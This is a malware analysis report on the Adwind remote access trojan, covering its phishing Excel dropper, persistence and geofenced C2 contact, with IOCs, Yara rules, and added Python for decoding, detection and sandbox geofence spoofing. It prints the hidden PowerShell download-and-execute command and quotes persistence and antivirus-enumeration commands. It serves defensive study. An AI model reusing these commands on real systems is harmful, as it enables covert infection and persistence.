
ADWIND RAT TECHNICAL ANALYSIS REPORT

This report analyses and documents in detail the file paths, registry entries, executed commands, network indicators and all other indicators of compromise of the Adwind Remote Access Trojan.

CONTENTS

Introduction
Rapor.xlsx Document Analysis
Adwind.jar File Analysis
Adwind.jar Network Analysis
Solution Proposals
Yara Rule
Introduction
The developer of the Adwind RAT is a Spanish-speaking hacker based in Mexico, who started distributing a Java-based remote access tool (RAT) called "Frutas", the first member of the Adwind family, in early 2012. The tool was rebranded at least seven times in the following years and was released under the names Adwind, UnReCoM, AlienSpy, JSocket, JBifrost, UnknownRat and JConnectPro.

Adwind RAT is a cross-platform, multi-functional malware program distributed through a single platform. One of the main features that distinguishes it from other commercial malware is its open distribution model: it is sold online as a paid service, in which the "customer" pays a fee for the use of the malicious program. By the end of 2015 the platform had approximately 1,800 users, which makes it one of the biggest malware platforms available today.

Between 2013 and 2016, different versions of Adwind were used in attacks against at least 443,000 private users and commercial and non-commercial organizations around the world.

On 11 January 2012, a user named "adwind" on the forum indetectables[.]net posted an article about "Frutas RAT". He wrote that he had started the Frutas RAT project and was progressing slowly because he did everything alone and used no third-party code, and that he used NetBeans as his development environment. This user released several updates for Frutas RAT throughout 2012. In December 2012 the until then free "Frutas RAT" was renamed "Adwind RAT" and became a paid product.

Adwind RAT, renamed in early 2013, was offered for sale through communication channels such as Skype or e-mail. It was launched at a price of $55, with the announcement that the price would rise to $100 as of February 15th. An update in 2013 added Android support. Thanks to its many features and its ability to run on most platforms, it became a very popular tool in a short time. Building on this popularity, the developer of Adwind RAT opened a YouTube channel and used it to share material such as tutorial videos on how to use Adwind RAT. Adwind RAT was first used in a targeted attack in the Asia-Pacific region. In November 2013 the malware was renamed UNRECOM; this rebranded version of Adwind retained all of its previous features.

In 2014 Adwind's source code leaked and became freely available online. In response to the leak, the "official" version of the Adwind Trojan was significantly upgraded and re-released as AlienSpy in October 2014. This version of the malware gained features such as sandbox detection, cryptographically secured communication with the control server, and automatic detection and disabling of antivirus programs.
Rapor.xlsx Document Analysis

File Name  Rapor.xlsx
MD5        5ba62c034584b88e44b5364e4131671c
SHA1       b4a8dfe2eebaf436c021458e515baf39ed812740
SHA256     9e61a8cf313337d2b72fc463164afc2e332fa26fda145c18fc6de6acd68af7db

Adwind first reaches the system as an Excel document attached to phishing e-mails. The e-mails carry varying content, and when the victim opens the attached workbook for the first time, a sheet of meaningless characters appears together with a warning that the content has to be activated ("you have to activate the content").

After this warning, the Excel document asks for permission to run cmd.exe, which executes a command hidden in its cells.

This command launches a hidden PowerShell process with the execution policy bypassed, downloads the actual malicious payload from a raw.githubusercontent.com URL (served under an .svg file name) into %tmp% as ACJTU.jar, and then runs the downloaded JAR, all without any further user interaction and without opening a console window on the screen. The command is visible in plain text when the hex values of the Excel document are examined; the full byte sequence is reproduced in the $s1 string of the Yara rule at the end of this report.

This Excel document, the first malicious file in the chain, performs no harmful action other than downloading the malicious code; its only role is that of a dropper.
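The following is an added example, not part of the original report: it decodes the byte pattern that the report's Rapor Yara rule carries for the embedded command and pulls out the indicators an incident responder needs (download URL, dropped file name, hidden-window and execution-policy flags, and whether the dropped file is executed). The hex pattern is copied from the Yara rule on this page; the treatment of the 0x03 byte after "cmd" as a field separator is an assumption made here.

```python
"""Decode the dropper command embedded in Rapor.xlsx from the byte pattern
in the Rapor Yara rule of this report, and pull out its indicators."""
import posixpath
import re
from typing import Dict
from urllib.parse import urlparse

# Byte pattern copied verbatim from the $s1 string of the Rapor Yara rule.
YARA_HEX = """
63 6D 64 03 2F 63 20 70 6F 77 65 72 73 68 65 6C 6C 20 2D 65 78 65 63 75 74
69 6F 6E 70 6F 6C 69 63 79 20 62 79 70 61 73 73 20 2D 57 20 48 69 64 64 65 6E 20 2D 63 6F 6D 6D
61 6E 64 20 22 26 20 7B 20 28 6E 65 77 2D 6F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E
57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 46 69 6C 65 28 5C 22 68 74 74 70 73 3A
2F 2F 72 61 77 2E 67 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 2E 63 6F 6D 2F 35 33 30 38
36 38 32 2F 34 79 62 61 38 34 34 34 6D 74 63 72 61 31 31 2F 67 68 2D 70 61 67 65 73 2F 77 75 63
67 79 33 6A 65 63 77 67 70 76 2E 73 76 67 5C 22 20 2C 5C 22 20 25 74 6D 70 25 5C 5C 41 43 4A 54
55 2E 6A 61 72 5C 22 29 20 7D 22 20 26 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 23 00
15 00 E2 7F 00 00 00 00 0E 59 32 31 35 49 4E 59 46 59 52 46 51 50 45 55
"""


def hex_pattern_to_bytes(hex_text: str) -> bytes:
    """Turn a whitespace-separated Yara hex pattern into raw bytes."""
    return bytes.fromhex("".join(hex_text.split()))


def extract_command(blob: bytes) -> str:
    """Return the printable run that starts at 'cmd'.

    The 0x03 byte right after 'cmd' is taken to separate the program from
    its arguments in the stored structure (assumption) and is rendered as a
    space; the run stops at the first byte that is neither printable ASCII
    nor 0x03.
    """
    start = blob.find(b"cmd")
    if start < 0:
        raise ValueError("no cmd payload in blob")
    chars = []
    for b in blob[start:]:
        if b == 0x03:
            chars.append(" ")
        elif 0x20 <= b < 0x7F:
            chars.append(chr(b))
        else:
            break
    return "".join(chars)


def extract_iocs(command: str) -> Dict[str, object]:
    """Pull the indicators a responder needs out of the decoded command."""
    url_m = re.search(r"https?://[^\s\"\\]+", command)
    drop_m = re.search(r"%tmp%\\+([A-Za-z0-9_.-]+)", command, re.I)
    url = url_m.group(0) if url_m else None
    dropped = drop_m.group(1) if drop_m else None
    url_ext = posixpath.splitext(urlparse(url).path)[1] if url else ""
    return {
        "uses_powershell": "powershell" in command.lower(),
        "hidden_window": bool(re.search(r"-W(?:indowStyle)?\s+Hidden", command, re.I)),
        "execution_policy_bypass": bool(re.search(r"-executionpolicy\s+bypass", command, re.I)),
        "download_url": url,
        "dropped_file": dropped,
        # the name on the server (.svg) does not match what is written to disk (.jar)
        "extension_mismatch": bool(dropped)
        and url_ext.lower() != posixpath.splitext(dropped)[1].lower(),
        # cmd runs the dropped file right after the PowerShell download returns
        "executes_dropped_file": bool(dropped)
        and bool(re.search(r'"\s*&\s*%tmp%\\+' + re.escape(dropped), command, re.I)),
    }


def analyze(hex_text: str = YARA_HEX) -> Dict[str, object]:
    """Decode the pattern and return the command together with its indicators."""
    command = extract_command(hex_pattern_to_bytes(hex_text))
    return {"command": command, "iocs": extract_iocs(command)}


if __name__ == "__main__":
    result = analyze()
    print(result["command"])
    for key, value in result["iocs"].items():
        print(f"{key:>24}: {value}")
```

The same decoder can be pointed at any other Yara hex pattern or at a byte slice cut from the workbook with a hex editor; the indicator extraction only relies on the PowerShell and cmd syntax, not on this particular sample.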

Adwind.jar File Analysis

File Name  Adwind.jar
MD5        8961392f55bdbfaa48c906ab5594afe3
SHA1       8ca09bebe64bc1f8a2b5e50d4883f81d58a9f9fc
SHA256     c52f88bc3da6ce73dbed459115b2fbdfa41effc4313ea6e5cf4a9bb162b916d0

The downloaded file, adwind.jar, carries out the actual malicious activity. The first thing we see when it is examined is that it has been obfuscated with Allatori, a commercial Java obfuscator. The obfuscation makes the code harder for antivirus products to detect and harder for analysts to read. When run on the system, the JAR first performs a number of checks: it determines the public IP address of the machine and, from that, the country it is located in (see the network analysis below). Only after these checks pass does it begin its harmful activity on the system.

First, it establishes persistence and reports to its command and control servers by running commands through a shell. To do so, it grants every user modify rights on the Java runtime usage directory under the all-users profile, so that it can write to the location where the Java program is installed on the system:

%WinDir%\system32\icacls.exe %AllUsersProfile%\Oracle\Java\.oracle_jre_usage /grant everyone:(OI)(CI)M

Having obtained these permissions, it registers itself to start every time the computer is booted. It places its copy, named "Uninstall.Uninstaller", in an "Uninstall" folder that it creates under the user's \AppData\Roaming directory, and adds a Run key that points the Java launcher at that file:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v JavaSun_Uninstall_00001_00002 /t REG_SZ /d \"%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe\" -jar \"%AppData%\Uninstall\Uninstall.Uninstaller\" /f

After adding itself to the Run key, it uses the Windows tool attrib.exe to hide the directory it lives in from the user: the "+h" parameter marks the files and the directory as hidden, "+r" marks them read-only to prevent changes to the file, and "+s" marks them as system files.

attrib +s +h +r %AppData%\Uninstall\*.*

attrib +s +h +r %AppData%\Uninstall
With these steps its persistence on the system is in place; from then on it is launched at every logon as:

%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe -jar %AppData%\Uninstall\Uninstall.Uninstaller

As soon as it starts, the malware uses WMIC.exe to enumerate the antivirus products registered on the system:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

After these steps it also hides the ".Uninstall" folder that it created in the user's home directory:

attrib +H %UserProfile%\.Uninstall
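The persistence chain above (icacls grant, Run key, attrib flags, WMIC antivirus enumeration, hidden dot-folder) is easiest to catch on the endpoint by correlating process-creation events from one parent process. The following is an added example, not code from the report: detection rules for each step, run over constructed Sysmon-style events whose command lines mirror those quoted in this report. The host names, the parent image (javaw.exe is assumed to be the parent), the benign look-alike events and the alerting threshold are all assumptions made for the example.

```python
"""Detection logic for the persistence and AV-enumeration commands described
in this report, run over constructed process-creation events."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample events (Sysmon-style process creation: host, parent image,
# command line). The command lines mirror those quoted in this report; host
# names, parent images and the benign events are made up for the example.
JAVAW = r"C:\Program Files\Java\jre1.8.0_251\bin\javaw.exe"
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": JAVAW, "cmdline":
     r"%WinDir%\system32\icacls.exe %AllUsersProfile%\Oracle\Java\.oracle_jre_usage /grant everyone:(OI)(CI)M"},
    {"host": "WS01", "parent": JAVAW, "cmdline":
     r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v JavaSun_Uninstall_00001_00002 /t REG_SZ '
     r'/d "%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe -jar %AppData%\Uninstall\Uninstall.Uninstaller" /f'},
    {"host": "WS01", "parent": JAVAW, "cmdline": r"attrib +s +h +r %AppData%\Uninstall\*.*"},
    {"host": "WS01", "parent": JAVAW, "cmdline": r"attrib +s +h +r %AppData%\Uninstall"},
    {"host": "WS01", "parent": JAVAW, "cmdline":
     r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"},
    {"host": "WS01", "parent": JAVAW, "cmdline": r"attrib +H %UserProfile%\.Uninstall"},
    # benign look-alikes that must not fire (constructed)
    {"host": "WS02", "parent": r"C:\Windows\System32\cmd.exe", "cmdline":
     r"icacls.exe C:\inetpub\wwwroot /grant IIS_IUSRS:(OI)(CI)RX"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe", "cmdline":
     r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ "
     r"/d C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /f"},
    {"host": "WS02", "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"attrib -r C:\temp\notes.txt"},
]

# One rule per step of the chain; each matches the command line for that step.
RULES = [
    ("jre_usage_acl_grant",
     re.compile(r"icacls(?:\.exe)?\s.*\.oracle_jre_usage\s+/grant\s+everyone", re.I)),
    ("run_key_javaw_jar",
     re.compile(r"reg(?:\.exe)?\s+add\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s"
                r".*javaw(?:\.exe)?.*-jar\s+\S*%AppData%", re.I)),
    ("attrib_system_hidden_readonly",
     re.compile(r"attrib(?:\.exe)?\s(?=.*\+s\b)(?=.*\+h\b)(?=.*\+r\b)", re.I)),
    ("wmic_av_enumeration",
     re.compile(r"wmic(?:\.exe)?\s.*SecurityCenter2.*AntiVirusProduct", re.I)),
    ("hidden_dotdir_in_profile",
     re.compile(r"attrib(?:\.exe)?\s+\+h\s+%UserProfile%\\\.\w+", re.I)),
]


def match_event(cmdline: str) -> List[str]:
    """Names of all chain steps that a single command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def correlate(events, threshold: int = 3) -> List[Dict[str, object]]:
    """Group matches by (host, parent process) and alert when the same parent
    performed at least `threshold` distinct steps, or when it registered a
    javaw -jar Run key, which is treated as high confidence on its own."""
    seen: Dict[tuple, set] = defaultdict(set)
    for ev in events:
        for name in match_event(ev["cmdline"]):
            seen[(ev["host"], ev["parent"])].add(name)
    alerts = []
    for (host, parent), names in sorted(seen.items()):
        if len(names) >= threshold or "run_key_javaw_jar" in names:
            alerts.append({"host": host, "parent": parent, "steps": sorted(names)})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"{alert['host']}: {alert['parent']} -> {', '.join(alert['steps'])}")
```

Keying the correlation on the parent image rather than on the host alone is what keeps the IIS and OneDrive look-alikes from adding noise: they come from different parents and never accumulate enough distinct steps.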

Adwind.jar Network Analysis

As soon as the malicious file lands on the system, it performs some checks and collects information. Based on the results of these checks it decides whether to infect the system, and only then does it communicate with the command and control server.

First, it obtains the public IP address of the victim system from Amazon's service at "http://checkip[.]amazonaws[.]com". It then uses the API of "ipinfo[.]io" to determine the country the victim is located in. The malware targets Turkey: it continues its work only when the returned country code is TR.

After these checks it carries out its harmful activity on the system, and it was determined that it communicates with the command and control server at the domain 21736[.]xyz.

At the time of analysis, however, the command and control server was no longer reachable.
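Because the sample only proceeds when ipinfo.io reports TR, a sandbox that is not in Turkey (or that has no internet access) will see the JAR stop before any of the persistence or C2 behaviour. The following is an added example, not part of the report: a small local stand-in for checkip.amazonaws.com and ipinfo.io that returns a chosen IP and the country code TR, so that an isolated sandbox can be steered past the geofence. It assumes the sandbox's DNS (or hosts file) for both names is pointed at the machine running the stub; the report does not state which ipinfo.io endpoint the sample calls, so both the JSON and the plain-text country forms are served, and the IP address returned is a constructed documentation address.

```python
"""Stub for the two lookup services Adwind uses as its geofence, so that a
sample detonated in an isolated sandbox can be steered past the TR check."""
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Tuple

FAKE_PUBLIC_IP = "203.0.113.10"  # RFC 5737 documentation address (constructed)
FAKE_COUNTRY = "TR"              # the country code this report identifies as the gate


class GeoStubHandler(BaseHTTPRequestHandler):
    """Dispatches on the Host header the sample sends once DNS for both names
    points at this machine.

      checkip.amazonaws.com/            -> plain-text IP plus newline
      ipinfo.io/json, /<ip>/json         -> JSON with "ip" and "country"
      ipinfo.io/country, /<ip>/country   -> plain-text country code

    Which ipinfo.io endpoint the sample calls is not stated in the report, so
    both forms are served (assumption).
    """

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        path = self.path.split("?", 1)[0]
        if host == "checkip.amazonaws.com":
            body, ctype = FAKE_PUBLIC_IP + "\n", "text/plain"
        elif host == "ipinfo.io" and path.endswith("/country"):
            body, ctype = FAKE_COUNTRY + "\n", "text/plain"
        elif host == "ipinfo.io":
            body = json.dumps({"ip": FAKE_PUBLIC_IP, "country": FAKE_COUNTRY})
            ctype = "application/json"
        else:
            self.send_error(404, "unknown host")
            return
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, fmt, *args):  # keep the sandbox console quiet
        pass


def start_stub(port: int = 0) -> Tuple[ThreadingHTTPServer, int]:
    """Serve on 127.0.0.1 in a background thread; port 0 picks a free port."""
    srv = ThreadingHTTPServer(("127.0.0.1", port), GeoStubHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(port: int, host: str, path: str) -> str:
    """GET path from the stub while presenting the given Host header,
    exactly as the sample would after its DNS lookup is redirected."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    try:
        conn.request("GET", path, headers={"Host": host})
        return conn.getresponse().read().decode().strip()
    finally:
        conn.close()


def geofence_check(port: int) -> Tuple[str, str, bool]:
    """Replay the sample's two lookups against the stub: public IP first,
    then the country for that IP; the gate passes only for TR."""
    ip = fetch(port, "checkip.amazonaws.com", "/")
    country = json.loads(fetch(port, "ipinfo.io", f"/{ip}/json"))["country"]
    return ip, country, country == "TR"


if __name__ == "__main__":
    server, bound_port = start_stub(8080)
    print(f"geo stub on 127.0.0.1:{bound_port}; self-test: {geofence_check(bound_port)}")
    threading.Event().wait()  # keep the process alive while the sandbox runs
```

Run it on the analysis host, then redirect checkip.amazonaws.com and ipinfo.io to that host in the sandbox's hosts file or DNS; the sample uses plain http for the Amazon lookup, so no certificate trickery is needed for that call. If the sample insists on https for ipinfo.io, the same handler can be wrapped in a TLS socket with a certificate the sandbox trusts.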


Solution Proposals
- Use up-to-date, reliable antivirus software on all systems.
- Read incoming e-mails carefully and do not open their attachments without scanning them.
- Ignore spam e-mails.
- Watch out for phishing sites while browsing the internet.
- Install the latest updates available for the operating system.
- Monitor the processes running on the system and the network connections they make.
- Filter, at the network level, the IP addresses and domains of C&C servers known to be used for malicious connections.

These measures can prevent the Adwind RAT from infecting and damaging the system.
Yara Rule
import "hash"

rule Rapor : xlsx
{
    meta:
        description = "Adwind RAT Trojan"
        first_date = "13.05.2020"
        report_date = "18.07.2020"
        file_name = "Rapor.xlsx"
    strings:
        // Embedded dropper command: cmd /c powershell -executionpolicy bypass -W Hidden
        // -command "& { (new-object System.Net.WebClient).DownloadFile(<url>, %tmp%\ACJTU.jar) }" & %tmp%\ACJTU.jar
        $s1 = { 63 6D 64 03 2F 63 20 70 6F 77 65 72 73 68 65 6C 6C 20 2D 65 78 65 63 75 74
                69 6F 6E 70 6F 6C 69 63 79 20 62 79 70 61 73 73 20 2D 57 20 48 69 64 64 65 6E 20 2D 63 6F 6D 6D
                61 6E 64 20 22 26 20 7B 20 28 6E 65 77 2D 6F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E
                57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 46 69 6C 65 28 5C 22 68 74 74 70 73 3A
                2F 2F 72 61 77 2E 67 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 2E 63 6F 6D 2F 35 33 30 38
                36 38 32 2F 34 79 62 61 38 34 34 34 6D 74 63 72 61 31 31 2F 67 68 2D 70 61 67 65 73 2F 77 75 63
                67 79 33 6A 65 63 77 67 70 76 2E 73 76 67 5C 22 20 2C 5C 22 20 25 74 6D 70 25 5C 5C 41 43 4A 54
                55 2E 6A 61 72 5C 22 29 20 7D 22 20 26 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 23 00
                15 00 E2 7F 00 00 00 00 0E 59 32 31 35 49 4E 59 46 59 52 46 51 50 45 55 }
        // Download URL of the Adwind JAR (served under an .svg file name)
        $s2 = "https://raw.githubusercontent.com/5308682/4yba8444mtcra11/gh-pages/wucgy3jecwgpv.svg"
    condition:
        hash.md5(0, filesize) == "5ba62c034584b88e44b5364e4131671c" or $s1 or $s2
}

rule Adwind : java
{
    meta:
        description = "Adwind RAT Trojan"
        first_date = "13.05.2020"
        report_date = "18.07.2020"
        file_name = "Adwind.jar"
    strings:
        // Allatori-obfuscated class names and other artifacts from the JAR's directory
        $s1 = "16245"
        $s2 = "A$D.class"
        $s3 = "A.class"
        $s4 = "B.class"
        $s5 = "C.class"
        $s6 = "D$A.class"
        $s7 = "D.class"
        $s8 = "u2Br3cvUkb"
        $s9 = "c.class"
        $s10 = "n.class"
        $s11 = "mny\\zsh"
    condition:
        hash.md5(0, filesize) == "8961392f55bdbfaa48c906ab5594afe3" or all of them
}
